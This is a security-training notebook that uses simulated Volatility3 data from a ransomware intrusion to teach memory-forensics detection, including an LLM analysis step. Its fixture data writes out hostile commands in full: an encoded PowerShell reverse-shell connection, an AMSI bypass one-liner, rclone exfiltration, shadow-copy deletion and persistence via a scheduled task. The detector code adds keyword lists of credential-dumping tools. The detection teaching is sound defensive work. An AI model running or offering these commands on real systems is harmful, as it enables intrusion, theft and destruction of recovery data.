# Lab 13: Memory Forensics AI

[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/depalmar/ai_for_the_win/blob/main/notebooks/lab13_memory_forensics.ipynb)

Use AI to analyze memory dumps and detect advanced threats.

## Learning Objectives
- Volatility3 integration for memory analysis
- Process injection detection
- Credential dumping identification
- LLM-powered artifact interpretation

In [ ]:
# Install dependencies
!pip install anthropic pandas -q

In [ ]:
import json
import pandas as pd
from typing import List, Dict
from dataclasses import dataclass

## 1. Memory Analysis Concepts

Key artifacts to analyze:
- **Processes**: Running executables
- **DLLs**: Loaded libraries per process
- **Network**: Active connections
- **Registry**: In-memory registry hives
- **Handles**: Open file/registry handles

In [ ]:
# Comprehensive simulated Volatility3 output - realistic memory analysis data
# Based on real-world incident response scenarios

# Process list with realistic attack patterns
SAMPLE_PROCESSES = [
    # Normal system processes
    {"pid": 4, "ppid": 0, "name": "System", "path": "", "cmdline": "", "user": "SYSTEM", "integrity": "System", "threads": 150},
    {"pid": 88, "ppid": 4, "name": "Registry", "path": "", "cmdline": "", "user": "SYSTEM", "integrity": "System", "threads": 4},
    {"pid": 456, "ppid": 4, "name": "smss.exe", "path": "C:\\Windows\\System32\\smss.exe", "cmdline": "", "user": "SYSTEM", "integrity": "System", "threads": 2},
    {"pid": 568, "ppid": 456, "name": "csrss.exe", "path": "C:\\Windows\\System32\\csrss.exe", "cmdline": "", "user": "SYSTEM", "integrity": "System", "threads": 12},
    {"pid": 652, "ppid": 568, "name": "wininit.exe", "path": "C:\\Windows\\System32\\wininit.exe", "cmdline": "", "user": "SYSTEM", "integrity": "System", "threads": 1},
    {"pid": 660, "ppid": 652, "name": "services.exe", "path": "C:\\Windows\\System32\\services.exe", "cmdline": "", "user": "SYSTEM", "integrity": "System", "threads": 8},
    {"pid": 668, "ppid": 652, "name": "lsass.exe", "path": "C:\\Windows\\System32\\lsass.exe", "cmdline": "", "user": "SYSTEM", "integrity": "System", "threads": 11},
    {"pid": 800, "ppid": 660, "name": "svchost.exe", "path": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k DcomLaunch -p", "user": "SYSTEM", "integrity": "System", "threads": 25},
    {"pid": 856, "ppid": 660, "name": "svchost.exe", "path": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k RPCSS -p", "user": "NETWORK SERVICE", "integrity": "System", "threads": 12},
    {"pid": 932, "ppid": 660, "name": "svchost.exe", "path": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs -p", "user": "SYSTEM", "integrity": "System", "threads": 45},
    
    # Normal user processes
    {"pid": 2100, "ppid": 2088, "name": "explorer.exe", "path": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe", "user": "CORP\\jsmith", "integrity": "Medium", "threads": 52},
    {"pid": 3200, "ppid": 2100, "name": "chrome.exe", "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "cmdline": "chrome.exe", "user": "CORP\\jsmith", "integrity": "Medium", "threads": 30},
    {"pid": 3456, "ppid": 2100, "name": "outlook.exe", "path": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "cmdline": "outlook.exe", "user": "CORP\\jsmith", "integrity": "Medium", "threads": 45},
    
    # === SUSPICIOUS PROCESSES - Attack Chain ===
    
    # Initial Access - Macro execution from Office
    {"pid": 4100, "ppid": 3456, "name": "WINWORD.EXE", "path": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", 
     "cmdline": "WINWORD.EXE /n \"C:\\Users\\jsmith\\AppData\\Local\\Temp\\Invoice_Q4_2024.docm\"", 
     "user": "CORP\\jsmith", "integrity": "Medium", "threads": 15},
    
    # Execution - PowerShell spawned from Word (malicious macro)
    {"pid": 4200, "ppid": 4100, "name": "powershell.exe", "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEALgAxADAAMAAiACwANAA0ADQANAApAA==",
     "user": "CORP\\jsmith", "integrity": "Medium", "threads": 8},
    
    # Cobalt Strike beacon (masquerading as rundll32)
    {"pid": 4350, "ppid": 4200, "name": "rundll32.exe", "path": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe",  # No arguments is suspicious for rundll32
     "user": "CORP\\jsmith", "integrity": "Medium", "threads": 3},
    
    # Discovery - whoami /all
    {"pid": 4400, "ppid": 4350, "name": "whoami.exe", "path": "C:\\Windows\\System32\\whoami.exe",
     "cmdline": "whoami /all", "user": "CORP\\jsmith", "integrity": "Medium", "threads": 1},
    
    # Discovery - net commands
    {"pid": 4450, "ppid": 4350, "name": "net.exe", "path": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net group \"Domain Admins\" /domain", "user": "CORP\\jsmith", "integrity": "Medium", "threads": 1},
    
    # Credential Access - Mimikatz disguised
    {"pid": 5100, "ppid": 4350, "name": "notepad.exe", "path": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe",  # Process hollowing - notepad running mimikatz code
     "user": "CORP\\jsmith", "integrity": "High", "threads": 5},  # Elevated
    
    # Lateral Movement - PsExec service
    {"pid": 5500, "ppid": 660, "name": "PSEXESVC.exe", "path": "C:\\Windows\\PSEXESVC.exe",
     "cmdline": "C:\\Windows\\PSEXESVC.exe", "user": "SYSTEM", "integrity": "System", "threads": 3},
    
    # Masquerading - svchost from wrong location
    {"pid": 5600, "ppid": 4350, "name": "svchost.exe", "path": "C:\\Users\\Public\\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "user": "SYSTEM", "integrity": "System", "threads": 4},
    
    # Defense Evasion - PowerShell AMSI bypass attempt
    {"pid": 5800, "ppid": 4350, "name": "powershell.exe", "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -ep bypass -c \"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\"",
     "user": "CORP\\jsmith", "integrity": "High", "threads": 6},
    
    # Exfiltration - rclone for data theft
    {"pid": 6100, "ppid": 4350, "name": "rclone.exe", "path": "C:\\Users\\Public\\rclone.exe",
     "cmdline": "rclone.exe copy C:\\Users\\jsmith\\Documents mega:exfil --transfers 10",
     "user": "CORP\\jsmith", "integrity": "Medium", "threads": 12},
    
    # Impact - Ransomware encryptor
    {"pid": 7000, "ppid": 4350, "name": "locker.exe", "path": "C:\\Windows\\Temp\\locker.exe",
     "cmdline": "locker.exe -path C:\\ -ext .lockbit -note README.txt",
     "user": "SYSTEM", "integrity": "System", "threads": 16},
    
    # Impact - Shadow copy deletion
    {"pid": 7100, "ppid": 7000, "name": "vssadmin.exe", "path": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet",
     "user": "SYSTEM", "integrity": "System", "threads": 1},
    
    # Impact - bcdedit recovery disable  
    {"pid": 7200, "ppid": 7000, "name": "bcdedit.exe", "path": "C:\\Windows\\System32\\bcdedit.exe",
     "cmdline": "bcdedit.exe /set {default} recoveryenabled No",
     "user": "SYSTEM", "integrity": "System", "threads": 1},
    
    # Persistence - Scheduled task
    {"pid": 7300, "ppid": 4350, "name": "schtasks.exe", "path": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /create /tn \"Windows Update\" /tr \"C:\\Users\\Public\\update.exe\" /sc onlogon /ru SYSTEM",
     "user": "SYSTEM", "integrity": "System", "threads": 1},
]

# Network connections
SAMPLE_CONNECTIONS = [
    {"pid": 3200, "local_addr": "192.168.1.50:52341", "remote_addr": "142.250.80.100:443", "state": "ESTABLISHED", "proto": "TCP"},  # Chrome - normal
    {"pid": 3456, "local_addr": "192.168.1.50:52890", "remote_addr": "40.97.156.114:443", "state": "ESTABLISHED", "proto": "TCP"},   # Outlook - normal
    {"pid": 4350, "local_addr": "192.168.1.50:49667", "remote_addr": "185.143.223.47:443", "state": "ESTABLISHED", "proto": "TCP"},  # Cobalt Strike C2!
    {"pid": 4350, "local_addr": "192.168.1.50:49668", "remote_addr": "185.143.223.47:8080", "state": "ESTABLISHED", "proto": "TCP"}, # Backup C2 channel
    {"pid": 5600, "local_addr": "192.168.1.50:49700", "remote_addr": "45.33.32.156:4444", "state": "ESTABLISHED", "proto": "TCP"},   # Reverse shell
    {"pid": 6100, "local_addr": "192.168.1.50:49800", "remote_addr": "66.203.125.13:443", "state": "ESTABLISHED", "proto": "TCP"},   # Mega.nz exfil
    {"pid": 800, "local_addr": "192.168.1.50:135", "remote_addr": "0.0.0.0:0", "state": "LISTENING", "proto": "TCP"},   # Normal RPC
    {"pid": 932, "local_addr": "192.168.1.50:445", "remote_addr": "0.0.0.0:0", "state": "LISTENING", "proto": "TCP"},   # Normal SMB
]

# Registry persistence artifacts
SAMPLE_REGISTRY = [
    {"key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "value": "SecurityHealth", "data": "C:\\Windows\\System32\\SecurityHealthSystray.exe", "suspicious": False},
    {"key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "value": "WindowsDefender", "data": "C:\\Users\\Public\\update.exe", "suspicious": True},
    {"key": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "value": "OneDrive", "data": "C:\\Users\\jsmith\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", "suspicious": False},
    {"key": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "value": "Updater", "data": "powershell.exe -w hidden -enc ...", "suspicious": True},
    {"key": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WSearch", "value": "ImagePath", "data": "C:\\Windows\\System32\\SearchIndexer.exe", "suspicious": False},
    {"key": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinDefend", "value": "Start", "data": "0x4", "suspicious": True},  # Defender disabled
]

# Injected DLLs and suspicious modules
SAMPLE_DLLS = [
    # Normal DLLs
    {"pid": 4100, "dll": "kernel32.dll", "path": "C:\\Windows\\System32\\kernel32.dll", "suspicious": False},
    {"pid": 4100, "dll": "ntdll.dll", "path": "C:\\Windows\\System32\\ntdll.dll", "suspicious": False},
    {"pid": 4100, "dll": "mscoree.dll", "path": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll", "suspicious": False},
    
    # Suspicious DLLs - Injection indicators
    {"pid": 5100, "dll": "unknown", "path": "", "suspicious": True},  # Unlinked module (process hollowing)
    {"pid": 5100, "dll": "samlib.dll", "path": "C:\\Windows\\System32\\samlib.dll", "suspicious": True},  # SAM access
    {"pid": 5100, "dll": "vaultcli.dll", "path": "C:\\Windows\\System32\\vaultcli.dll", "suspicious": True},  # Credential vault
    {"pid": 4350, "dll": "winhttp.dll", "path": "C:\\Windows\\System32\\winhttp.dll", "suspicious": True},  # HTTP comms
    {"pid": 4350, "dll": "secur32.dll", "path": "C:\\Windows\\System32\\secur32.dll", "suspicious": True},  # Security APIs
    {"pid": 5600, "dll": "evil.dll", "path": "C:\\Users\\Public\\evil.dll", "suspicious": True},  # User directory DLL
    {"pid": 668, "dll": "mimilib.dll", "path": "", "suspicious": True},  # Mimikatz in LSASS!
    {"pid": 5800, "dll": "amsi.dll", "path": "", "suspicious": True},  # AMSI potentially unhooked
]

# Malfind results - suspicious memory regions
SAMPLE_MALFIND = [
    {"pid": 4350, "address": "0x7ff604a80000", "size": 0x1000, "protection": "PAGE_EXECUTE_READWRITE", 
     "content_preview": "MZ...This program cannot be run in DOS mode", "tag": "Injected PE"},
    {"pid": 5100, "address": "0x7ff612340000", "size": 0x2000, "protection": "PAGE_EXECUTE_READWRITE",
     "content_preview": "48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18", "tag": "Shellcode"},
    {"pid": 5600, "address": "0x7ff625670000", "size": 0x5000, "protection": "PAGE_EXECUTE_READWRITE",
     "content_preview": "MZ...KERNEL32.DLL.VirtualAlloc.LoadLibraryA", "tag": "Reflective DLL"},
    {"pid": 668, "address": "0x7ff630000000", "size": 0x8000, "protection": "PAGE_EXECUTE_READWRITE",
     "content_preview": "sekurlsa::logonpasswords", "tag": "Mimikatz in LSASS"},
]

# Process handles - files and keys being accessed
SAMPLE_HANDLES = [
    {"pid": 5100, "type": "File", "name": "\\Device\\HarddiskVolume2\\Windows\\System32\\config\\SAM", "suspicious": True},
    {"pid": 5100, "type": "File", "name": "\\Device\\HarddiskVolume2\\Windows\\System32\\config\\SYSTEM", "suspicious": True},
    {"pid": 6100, "type": "File", "name": "\\Device\\HarddiskVolume2\\Users\\jsmith\\Documents\\Financial_Report_2024.xlsx", "suspicious": True},
    {"pid": 7000, "type": "File", "name": "\\Device\\HarddiskVolume2\\Users\\jsmith\\Desktop\\README.txt", "suspicious": True},
    {"pid": 4350, "type": "Key", "name": "\\REGISTRY\\MACHINE\\SAM\\SAM\\Domains\\Account", "suspicious": True},
]

df_procs = pd.DataFrame(SAMPLE_PROCESSES)
df_conns = pd.DataFrame(SAMPLE_CONNECTIONS)
df_dlls = pd.DataFrame(SAMPLE_DLLS)

print("=" * 70)
print("MEMORY FORENSICS ANALYSIS - INCIDENT RESPONSE SCENARIO")
print("=" * 70)

print(f"\n📋 Process Summary: {len(SAMPLE_PROCESSES)} processes captured")
print(f"🌐 Network Connections: {len(SAMPLE_CONNECTIONS)} active connections")
print(f"📚 DLL Modules: {len(SAMPLE_DLLS)} loaded modules")
print(f"⚠️  Suspicious Memory Regions: {len(SAMPLE_MALFIND)} found via malfind")

print("\n" + "=" * 70)
print("PROCESS TREE - Suspicious Chain Highlighted")
print("=" * 70)

# Display attack chain
attack_pids = [4100, 4200, 4350, 4400, 4450, 5100, 5600, 5800, 6100, 7000, 7100, 7200]
print("\n🔴 ATTACK CHAIN IDENTIFIED:")
for proc in SAMPLE_PROCESSES:
    if proc['pid'] in attack_pids:
        indent = "   " if proc['pid'] != 4100 else ""
        print(f"{indent}├── PID {proc['pid']}: {proc['name']}")
        print(f"{indent}│   Path: {proc['path']}")
        if len(proc['cmdline']) > 60:
            print(f"{indent}│   Cmd: {proc['cmdline'][:60]}...")
        else:
            print(f"{indent}│   Cmd: {proc['cmdline']}")

## 2. Detecting Suspicious Processes

In [ ]:
from enum import Enum

class AnomalySeverity(Enum):
    CRITICAL = "CRITICAL"
    HIGH = "HIGH"
    MEDIUM = "MEDIUM"
    LOW = "LOW"

@dataclass
class ProcessAnomaly:
    pid: int
    name: str
    anomaly_type: str
    description: str
    severity: AnomalySeverity
    mitre_technique: str
    iocs: List[str] = None

class ComprehensiveProcessAnalyzer:
    """Advanced process anomaly detection based on real-world attacks."""
    
    # Known system paths for validation
    SYSTEM32 = "C:\\Windows\\System32"
    SYSWOW64 = "C:\\Windows\\SysWOW64"
    
    # Legitimate parent-child relationships
    VALID_PARENTS = {
        "smss.exe": ["System"],
        "csrss.exe": ["smss.exe"],
        "wininit.exe": ["smss.exe"],
        "services.exe": ["wininit.exe"],
        "lsass.exe": ["wininit.exe"],
        "svchost.exe": ["services.exe"],
        "explorer.exe": ["userinit.exe", "winlogon.exe"],
    }
    
    # Processes that should never spawn cmd/powershell
    NO_SHELL_SPAWN = ["WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE", "AcroRd32.exe"]
    
    # Known suspicious process names
    SUSPICIOUS_NAMES = ["mimikatz", "procdump", "lazagne", "rubeus", "sharphound"]
    
    # Known C2 framework indicators
    C2_INDICATORS = {
        "rundll32.exe": ["No arguments", "Single thread"],
        "regsvr32.exe": ["Network connection", "/s /i:http"],
        "mshta.exe": ["http://", "javascript:"],
        "certutil.exe": ["-urlcache", "-decode", "-encode"],
    }
    
    def __init__(self, processes: List[Dict], connections: List[Dict], dlls: List[Dict], malfind: List[Dict]):
        self.processes = {p['pid']: p for p in processes}
        self.connections = connections
        self.dlls = dlls
        self.malfind = malfind
        self.anomalies = []
    
    def analyze_all(self) -> List[ProcessAnomaly]:
        """Run all analysis modules."""
        self._check_masquerading()
        self._check_parent_child()
        self._check_office_spawning()
        self._check_encoded_powershell()
        self._check_path_anomalies()
        self._check_lolbins_abuse()
        self._check_process_injection()
        self._check_credential_access()
        self._check_network_anomalies()
        self._check_impact_indicators()
        return self.anomalies
    
    def _check_masquerading(self):
        """T1036 - Masquerading detection."""
        system_binaries = ["svchost.exe", "csrss.exe", "lsass.exe", "services.exe", "smss.exe"]
        
        for pid, proc in self.processes.items():
            name_lower = proc['name'].lower()
            
            # Check system binaries running from wrong paths
            if name_lower in system_binaries:
                if self.SYSTEM32 not in proc['path'] and proc['path']:
                    self.anomalies.append(ProcessAnomaly(
                        pid=pid, name=proc['name'],
                        anomaly_type="masquerading",
                        description=f"System binary running from non-standard path: {proc['path']}",
                        severity=AnomalySeverity.CRITICAL,
                        mitre_technique="T1036.005",
                        iocs=[proc['path']]
                    ))
    
    def _check_parent_child(self):
        """Check for invalid parent-child relationships."""
        for pid, proc in self.processes.items():
            name_lower = proc['name'].lower()
            ppid = proc['ppid']
            
            if name_lower in self.VALID_PARENTS:
                parent = self.processes.get(ppid)
                if parent:
                    valid_parents = [p.lower() for p in self.VALID_PARENTS[name_lower]]
                    if parent['name'].lower() not in valid_parents:
                        self.anomalies.append(ProcessAnomaly(
                            pid=pid, name=proc['name'],
                            anomaly_type="invalid_parent",
                            description=f"{proc['name']} spawned by {parent['name']} (expected: {self.VALID_PARENTS[name_lower]})",
                            severity=AnomalySeverity.HIGH,
                            mitre_technique="T1055",
                            iocs=[f"Parent PID: {ppid}"]
                        ))
    
    def _check_office_spawning(self):
        """T1566.001 - Office applications spawning shells."""
        for pid, proc in self.processes.items():
            parent = self.processes.get(proc['ppid'])
            if parent and parent['name'].upper() in self.NO_SHELL_SPAWN:
                if proc['name'].lower() in ['cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe']:
                    self.anomalies.append(ProcessAnomaly(
                        pid=pid, name=proc['name'],
                        anomaly_type="office_shell_spawn",
                        description=f"{parent['name']} spawned {proc['name']} - likely macro execution",
                        severity=AnomalySeverity.CRITICAL,
                        mitre_technique="T1566.001",
                        iocs=[parent['cmdline'], proc['cmdline']]
                    ))
    
    def _check_encoded_powershell(self):
        """T1059.001 - Encoded PowerShell detection."""
        encoded_indicators = ['-enc', '-encodedcommand', '-e ', 'frombase64']
        hidden_indicators = ['-w hidden', '-windowstyle hidden', '-nop', '-noprofile']
        
        for pid, proc in self.processes.items():
            if 'powershell' in proc['name'].lower():
                cmdline = proc.get('cmdline', '').lower()
                
                encoded = any(ind in cmdline for ind in encoded_indicators)
                hidden = any(ind in cmdline for ind in hidden_indicators)
                
                if encoded:
                    self.anomalies.append(ProcessAnomaly(
                        pid=pid, name=proc['name'],
                        anomaly_type="encoded_powershell",
                        description="PowerShell with encoded command detected",
                        severity=AnomalySeverity.CRITICAL if hidden else AnomalySeverity.HIGH,
                        mitre_technique="T1059.001",
                        iocs=[proc['cmdline'][:200]]
                    ))
                
                # AMSI bypass detection
                if 'amsiutils' in cmdline or 'amsiinitfailed' in cmdline:
                    self.anomalies.append(ProcessAnomaly(
                        pid=pid, name=proc['name'],
                        anomaly_type="amsi_bypass",
                        description="AMSI bypass attempt detected in PowerShell",
                        severity=AnomalySeverity.CRITICAL,
                        mitre_technique="T1562.001",
                        iocs=[proc['cmdline'][:200]]
                    ))
    
    def _check_path_anomalies(self):
        """Executables running from suspicious locations."""
        suspicious_paths = ['\\Users\\Public\\', '\\Temp\\', '\\AppData\\Local\\Temp\\', '\\Downloads\\']
        
        for pid, proc in self.processes.items():
            path = proc.get('path', '')
            for sus_path in suspicious_paths:
                if sus_path.lower() in path.lower():
                    # Exclude known legitimate temp executables
                    if proc['name'].lower() not in ['setup.exe', 'msiexec.exe']:
                        self.anomalies.append(ProcessAnomaly(
                            pid=pid, name=proc['name'],
                            anomaly_type="suspicious_path",
                            description=f"Executable running from suspicious location: {path}",
                            severity=AnomalySeverity.HIGH,
                            mitre_technique="T1204.002",
                            iocs=[path]
                        ))
    
    def _check_lolbins_abuse(self):
        """Living-off-the-land binary abuse detection."""
        for pid, proc in self.processes.items():
            name_lower = proc['name'].lower()
            cmdline = proc.get('cmdline', '').lower()
            
            # rundll32 with no arguments (beacon indicator)
            if name_lower == 'rundll32.exe' and cmdline.strip() == 'rundll32.exe':
                self.anomalies.append(ProcessAnomaly(
                    pid=pid, name=proc['name'],
                    anomaly_type="lolbin_abuse",
                    description="rundll32.exe running without arguments - possible injected beacon",
                    severity=AnomalySeverity.CRITICAL,
                    mitre_technique="T1218.011",
                    iocs=["No DLL argument"]
                ))
            
            # certutil downloading
            if name_lower == 'certutil.exe' and any(x in cmdline for x in ['-urlcache', 'http']):
                self.anomalies.append(ProcessAnomaly(
                    pid=pid, name=proc['name'],
                    anomaly_type="lolbin_abuse",
                    description="certutil.exe used for file download",
                    severity=AnomalySeverity.HIGH,
                    mitre_technique="T1105",
                    iocs=[cmdline]
                ))
    
    def _check_process_injection(self):
        """T1055 - Process injection via malfind results."""
        for finding in self.malfind:
            proc = self.processes.get(finding['pid'])
            proc_name = proc['name'] if proc else f"PID {finding['pid']}"
            
            self.anomalies.append(ProcessAnomaly(
                pid=finding['pid'], name=proc_name,
                anomaly_type="process_injection",
                description=f"{finding['tag']} at {finding['address']} ({finding['protection']})",
                severity=AnomalySeverity.CRITICAL,
                mitre_technique="T1055",
                iocs=[finding['content_preview'][:50]]
            ))
    
    def _check_credential_access(self):
        """T1003 - Credential dumping indicators."""
        cred_dlls = ['samlib.dll', 'vaultcli.dll', 'mimilib.dll', 'sekurlsa']
        
        for dll in self.dlls:
            if dll.get('suspicious') and any(c in dll['dll'].lower() for c in cred_dlls):
                proc = self.processes.get(dll['pid'])
                proc_name = proc['name'] if proc else f"PID {dll['pid']}"
                
                self.anomalies.append(ProcessAnomaly(
                    pid=dll['pid'], name=proc_name,
                    anomaly_type="credential_access",
                    description=f"Credential access DLL loaded: {dll['dll']}",
                    severity=AnomalySeverity.CRITICAL,
                    mitre_technique="T1003.001",
                    iocs=[dll['dll'], dll.get('path', '')]
                ))
    
    def _check_network_anomalies(self):
        """Suspicious network connections."""
        suspicious_ports = [4444, 5555, 6666, 8080, 8443, 1337, 31337]
        
        for conn in self.connections:
            proc = self.processes.get(conn['pid'])
            remote = conn['remote_addr']
            
            # Check for suspicious ports
            port = int(remote.split(':')[1]) if ':' in remote else 0
            if port in suspicious_ports and conn['state'] == 'ESTABLISHED':
                self.anomalies.append(ProcessAnomaly(
                    pid=conn['pid'], name=proc['name'] if proc else f"PID {conn['pid']}",
                    anomaly_type="suspicious_connection",
                    description=f"Connection to suspicious port: {remote}",
                    severity=AnomalySeverity.HIGH,
                    mitre_technique="T1071.001",
                    iocs=[remote]
                ))
    
    def _check_impact_indicators(self):
        """T1486/T1490 - Ransomware impact indicators."""
        impact_commands = ['vssadmin', 'wbadmin', 'bcdedit', 'wmic shadowcopy']
        
        for pid, proc in self.processes.items():
            cmdline = proc.get('cmdline', '').lower()
            
            for impact_cmd in impact_commands:
                if impact_cmd in cmdline:
                    self.anomalies.append(ProcessAnomaly(
                        pid=pid, name=proc['name'],
                        anomaly_type="impact_indicator",
                        description=f"Backup/recovery tampering detected: {impact_cmd}",
                        severity=AnomalySeverity.CRITICAL,
                        mitre_technique="T1490",
                        iocs=[proc['cmdline']]
                    ))

# Run comprehensive analysis
analyzer = ComprehensiveProcessAnalyzer(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS, SAMPLE_DLLS, SAMPLE_MALFIND)
anomalies = analyzer.analyze_all()

print("\n" + "=" * 70)
print("COMPREHENSIVE ANOMALY DETECTION RESULTS")
print("=" * 70)

# Group by severity
by_severity = {}
for a in anomalies:
    sev = a.severity.value
    if sev not in by_severity:
        by_severity[sev] = []
    by_severity[sev].append(a)

print(f"\n📊 Total Anomalies Detected: {len(anomalies)}")
for sev in ["CRITICAL", "HIGH", "MEDIUM", "LOW"]:
    count = len(by_severity.get(sev, []))
    if count > 0:
        print(f"   {sev}: {count}")

for sev in ["CRITICAL", "HIGH"]:
    if sev in by_severity:
        print(f"\n🔴 {sev} SEVERITY FINDINGS:")
        for a in by_severity[sev][:10]:  # Show top 10
            print(f"\n   [{a.mitre_technique}] {a.anomaly_type.upper()}")
            print(f"   PID: {a.pid} ({a.name})")
            print(f"   {a.description}")
            if a.iocs:
                print(f"   IOCs: {a.iocs[0][:60]}...")

## 3. DLL Injection Detection

In [ ]:
# Simulated DLL list
SAMPLE_DLLS = [
    {"pid": 1234, "dll": "kernel32.dll", "path": "C:\\Windows\\System32\\kernel32.dll"},
    {"pid": 1234, "dll": "ntdll.dll", "path": "C:\\Windows\\System32\\ntdll.dll"},
    {"pid": 1234, "dll": "evil.dll", "path": "C:\\Users\\Public\\evil.dll"},  # Suspicious!
    {"pid": 5678, "dll": "amsi.dll", "path": ""},  # Unlinked - potentially hollowed
]

def detect_dll_anomalies(dlls: List[Dict]) -> List[Dict]:
    """Detect suspicious DLL patterns."""
    suspicious = []
    
    for dll in dlls:
        # Check for DLLs from user directories
        if 'Users' in dll.get('path', ''):
            suspicious.append({
                "pid": dll['pid'],
                "dll": dll['dll'],
                "type": "user_path_dll",
                "description": f"DLL loaded from user directory: {dll['path']}"
            })
        
        # Check for unlinked DLLs (potential hollowing)
        if not dll.get('path'):
            suspicious.append({
                "pid": dll['pid'],
                "dll": dll['dll'],
                "type": "unlinked_dll",
                "description": "DLL with no path - possible hollowing"
            })
    
    return suspicious

dll_anomalies = detect_dll_anomalies(SAMPLE_DLLS)
for a in dll_anomalies:
    print(f"PID {a['pid']}: {a['type']} - {a['description']}")

## 4. LLM-Powered Analysis

In [ ]:
from anthropic import Anthropic

def analyze_memory_artifacts(processes: List[Dict], dlls: List[Dict]) -> str:
    """Use LLM to analyze memory artifacts."""
    
    client = Anthropic()
    
    prompt = f"""
    You are a memory forensics expert. Analyze these artifacts from a Windows memory dump.
    
    PROCESSES:
    {json.dumps(processes, indent=2)}
    
    LOADED DLLs:
    {json.dumps(dlls, indent=2)}
    
    Provide:
    1. Summary of findings
    2. Identified threats (with MITRE ATT&CK techniques)
    3. Indicators of Compromise
    4. Recommended next steps
    """
    
    response = client.messages.create(
        model="claude-sonnet-4-20250514",
        max_tokens=2000,
        messages=[{"role": "user", "content": prompt}]
    )
    
    return response.content[0].text

# Uncomment to run with API key
# analysis = analyze_memory_artifacts(SAMPLE_PROCESSES, SAMPLE_DLLS)
# print(analysis)

## 5. Credential Detection

In [ ]:
# Patterns indicating credential access
CREDENTIAL_INDICATORS = [
    {"pattern": "lsass.exe", "type": "process", "technique": "T1003.001"},
    {"pattern": "sekurlsa", "type": "string", "technique": "T1003.001"},
    {"pattern": "mimikatz", "type": "string", "technique": "T1003"},
    {"pattern": "procdump", "type": "cmdline", "technique": "T1003.001"},
]

def check_credential_access(processes: List[Dict]) -> List[Dict]:
    """Check for credential dumping indicators."""
    findings = []
    
    for proc in processes:
        cmdline = proc.get('cmdline', '').lower()
        name = proc.get('name', '').lower()
        
        # Check for lsass access
        if 'lsass' in cmdline:
            findings.append({
                "pid": proc['pid'],
                "indicator": "LSASS access in command line",
                "technique": "T1003.001",
                "severity": "CRITICAL"
            })
        
        # Check for known tools
        if 'mimikatz' in name or 'procdump' in cmdline:
            findings.append({
                "pid": proc['pid'],
                "indicator": "Credential dumping tool detected",
                "technique": "T1003",
                "severity": "CRITICAL"
            })
    
    return findings

cred_findings = check_credential_access(SAMPLE_PROCESSES)
print(f"Credential access findings: {len(cred_findings)}")

## Key Takeaways

1. **Process Analysis**: Check paths, parent-child relationships, command lines
2. **DLL Injection**: Look for unusual paths, unlinked modules
3. **Credential Access**: Monitor LSASS access patterns
4. **LLM Enhancement**: Use AI to correlate and explain findings

## Next Steps
- **Lab 14**: C2 Traffic Analysis
- **Lab 15**: Lateral Movement Detection